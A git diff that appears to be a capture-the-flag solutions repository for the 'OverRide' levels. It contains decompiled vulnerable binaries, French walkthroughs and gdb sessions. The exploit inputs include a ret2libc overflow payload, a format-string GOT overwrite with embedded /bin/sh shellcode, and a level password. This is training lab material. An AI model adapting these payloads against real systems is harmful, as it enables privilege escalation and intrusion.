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 -This is free software: you are free to change and redistribute it. -There is NO WARRANTY, to the extent permitted by law. Type "show copying" -and "show warranty" for details. -This GDB was configured as "x86_64-linux-gnu". -For bug reporting instructions, please see: -... -Reading symbols from /home/users/level04/level04...(no debugging symbols found)...done. -(gdb) b main+150 -Function "main+150" not defined. -Make breakpoint pending on future shared library load? (y or [n]) ^Cn -(gdb) Quit -(gdb) b *main+150 -Breakpoint 1 at 0x804875e -(gdb) set follow-fork-mode child -(gdb) run -Starting program: /home/users/level04/level04 -[New process 1813] -Give me some shellcode, k -[Switching to process 1813] - -Breakpoint 1, 0x0804875e in main () -(gdb) p system -$1 = {} 0xf7e6aed0 -(gdb) p (char *)getenv("EGG") -$2 = 0xffffd857 ' ' ... -(gdb) exit -Undefined command: "exit". Try "help". -(gdb) quit -A debugging session is active. - - Inferior 2 [process 1813] will be killed. - -Quit anyway? (y or n) y -child is exiting... -level04@OverRide:~$ env -TERM=xterm-256color -SHELL=/bin/bash -SSH_CLIENT=10.0.2.2 59932 4242 -OLDPWD=/home/users/level04 -SSH_TTY=/dev/pts/0 -EGG= /bin/sh -USER=level04 -LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lz=01;31:*.xz=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.axv=01;35:*.anx=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.axa=00;36:*.oga=00;36:*.spx=00;36:*.xspf=00;36: -MAIL=/var/mail/level04 -PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games -PWD=/home/users/level04 -LANG=en_US.UTF-8 -SHLVL=1 -HOME=/home/users/level04 -LANGUAGE=en_US:en -LOGNAME=level04 -SSH_CONNECTION=10.0.2.2 59932 10.0.2.15 4242 -LESSOPEN=| /usr/bin/lesspipe %s -LESSCLOSE=/usr/bin/lesspipe %s %s -_=/usr/bin/env -level04@OverRide:~$ python -c "print('A'*156+'\xd0\xae\xe6\xf7'+' '+'\xa0\xd8\xff\xff')" > exploit.txt --bash: exploit.txt: Permission denied -level04@OverRide:~$ chmod +w . -level04@OverRide:~$ python -c "print('A'*156+'\xd0\xae\xe6\xf7'+' '+'\xa0\xd8\xff\xff')" > exploit.txt -level04@OverRide:~$ cat exploit.txt - | ./level04 -Give me some shellcode, k -whoami -level05 -cat /home/users/level05/.pass -3v8QLcN5SAhPaZZfEasfmXdwyR59ktDEMAwHF3aN - - diff --git a/level04/source b/level04/source new file mode 100644 index 0000000..aa8857c --- /dev/null +++ b/level04/source @@ -0,0 +1,46 @@ + +undefined4 main(void) + +{ + int iVar1; + undefined4 *puVar2; + byte bVar3; + uint local_a4; + undefined4 local_a0 [32]; + uint local_20; + uint local_1c; + long local_18; + __pid_t local_14; + + bVar3 = 0; + local_14 = fork(); + puVar2 = local_a0; + for (iVar1 = 0x20; iVar1 != 0; iVar1 = iVar1 + -1) { + *puVar2 = 0; + puVar2 = puVar2 + (uint)bVar3 * -2 + 1; + } + local_18 = 0; + local_a4 = 0; + if (local_14 == 0) { + prctl(1,1); + ptrace(PTRACE_TRACEME,0,0,0); + puts("Give me some shellcode, k"); + gets((char *)local_a0); + } + else { + do { + wait(&local_a4); + local_20 = local_a4; + if (((local_a4 & 0x7f) == 0) || + (local_1c = local_a4, '\0' < (char)(((byte)local_a4 & 0x7f) + 1) >> 1)) { + puts("child is exiting..."); + return 0; + } + local_18 = ptrace(PTRACE_PEEKUSER,local_14,0x2c,0); + } while (local_18 != 0xb); + puts("no exec() for you"); + kill(local_14,9); + } + return 0; +} + diff --git a/level04/walkthrough b/level04/walkthrough new file mode 100644 index 0000000..ab4acba --- /dev/null +++ b/level04/walkthrough @@ -0,0 +1,10 @@ +On remarque qu'on peut faire un ret override apres 156 'A', en revanche on ne peut pas utiliser de shellcode a cause du ptrace et de mecanique de fork (je crois). Il faut donc utiliser un ret2libc et appeler system avec l'argument "/bin/sh", on va devoir mettre des espace devant pour faire un un nop slide, en effet on n'est pas sur de taper au bon endroit en dehors de gdb et system trim l'input. Il faut aussi passer le bon argument a system, on peut le faire 8 bytes apres l'addresse du call on met l'address de notre variable d'evironnement dedans + +level04@OverRide:~$ export EGG=" /bin/sh" +level04@OverRide:~$ python -c "print('A'*156+'\xd0\xae\xe6\xf7'+' '+'\xa0\xd8\xff\xff')" > /tmp/exploit.txt +level04@OverRide:~$ cat /tmp/exploit.txt - | ./level04 +Give me some shellcode, k +whoami +level05 + + diff --git a/level05/Ressources/level05 b/level05/Ressources/level05 deleted file mode 100755 index b52ad99230a5327dfc28bfa6f044f0d17e010fae..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 5176 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 diff --git a/level05/Ressources/walktrough.md b/level05/Ressources/walktrough.md deleted file mode 100644 index 2168b86..0000000 --- a/level05/Ressources/walktrough.md +++ /dev/null @@ -1,4 +0,0 @@ -level05@OverRide:~$ rm -f exploit && python -c "print('\xe0\x97\x04\x08'+'\xe2\x97\x04\x08'+'\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68'+'%54914x'+'%10\$n'+'%10555x'+'%11\$n')" > exploit -level05@OverRide:~$ cat exploit - | /home/users/level05/level05 - -write in 2 times with %n $ speifiy argument number, overwrite GOT table to jmp to shellcode diff --git a/level05/source b/level05/source new file mode 100644 index 0000000..c6a3591 --- /dev/null +++ b/level05/source @@ -0,0 +1,35 @@ +void main(void) + +{ + byte bVar1; + uint uVar2; + byte *pbVar3; + byte bVar4; + byte local_78 [100]; + uint local_14; + + bVar4 = 0; + local_14 = 0; + fgets((char *)local_78,100,stdin); + local_14 = 0; + do { + uVar2 = 0xffffffff; + pbVar3 = local_78; + do { + if (uVar2 == 0) break; + uVar2 = uVar2 - 1; + bVar1 = *pbVar3; + pbVar3 = pbVar3 + (uint)bVar4 * -2 + 1; + } while (bVar1 != 0); + if (~uVar2 - 1 <= local_14) { + printf((char *)local_78); + /* WARNING: Subroutine does not return */ + exit(0); + } + if (('@' < (char)local_78[local_14]) && ((char)local_78[local_14] < '[')) { + local_78[local_14] = local_78[local_14] ^ 0x20; + } + local_14 = local_14 + 1; + } while( true ); +} + diff --git a/level05/walkthrough b/level05/walkthrough new file mode 100644 index 0000000..aab4e40 --- /dev/null +++ b/level05/walkthrough @@ -0,0 +1,4 @@ +C'est un exploit printf avec un nombre trop grand pour etre ecrit via un seul %n, on en utilise donc 2 pour ecrire 2 bytes chacun. A noter qu'on aurait pu utiliser %hn aussi ce qui aurait ete plus propre. On override la got table avec l'adresse d'un shellcode place judicieusement dans la format string. A noter le $ qui permet de simuler le nieme arguement ce qui permet de rajouter un %x entre les 2 malgre qu'il devrait etre consecutif. (surement ca peut se bypass en decalant la deuxieme adresse '\xe2\x97\x04\x08' 4 bytes plus loin) + +level05@OverRide:~$ rm -f exploit && python -c "print('\xe0\x97\x04\x08'+'\xe2\x97\x04\x08'+'\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68'+'%54914x'+'%10\$n'+'%10555x'+'%11\$n')" > exploit +level05@OverRide:~$ cat exploit - | /home/users/level05/level05 diff --git a/level06/Ressources/level06 b/level06/Ressources/level06 deleted file mode 100755 index 3a2fb2fea2bcb3bca69d8dbee9b49515ceb2e4fa..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 7907 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 rEc@ Enter Login: "); + fgets(local_34,0x20,stdin); + puts("***********************************"); + puts("***** NEW ACCOUNT DETECTED ********"); + puts("***********************************"); + printf("-> Enter Serial: "); + __isoc99_scanf(); + iVar1 = auth(); + if (iVar1 == 0) { + puts("Authenticated!"); + system("/bin/sh"); + } + if (local_14 != *(int *)(in_GS_OFFSET + 0x14)) { + /* WARNING: Subroutine does not return */ + __stack_chk_fail(); + } + return iVar1 != 0; +} + diff --git a/level06/walkthrough b/level06/walkthrough new file mode 100644 index 0000000..dd187c4 --- /dev/null +++ b/level06/walkthrough @@ -0,0 +1 @@ +Il faut donner le bon numero de serie selon le login, on voit grace a ghidra l'algo de hash utilise, il suffit de le reverse (test.c) diff --git a/level07/Ressources/exploit.txt b/level07/Ressources/exploit.txt new file mode 100644 index 0000000..c015892 --- /dev/null +++ b/level07/Ressources/exploit.txt @@ -0,0 +1,40 @@ +store +1185988657 +43 +store +3375487793 +44 +store +384532685 +2147483693 +store +2294296923 +46 +store +1535706947 +47 +store +205752584 +2147483696 +store +1267534768 +49 +store +206802184 +50 +store +3857219789 +2147483699 +store +805306367 +52 +store +795765090 +53 +store +26739 +2147483702 +store +4294956528 +-1040108880 +store diff --git a/level07/Ressources/level07 b/level07/Ressources/level07 deleted file mode 100755 index d56fd3c72e9a9c0021e815717b4fc5e4ef641f0d..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 11744 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 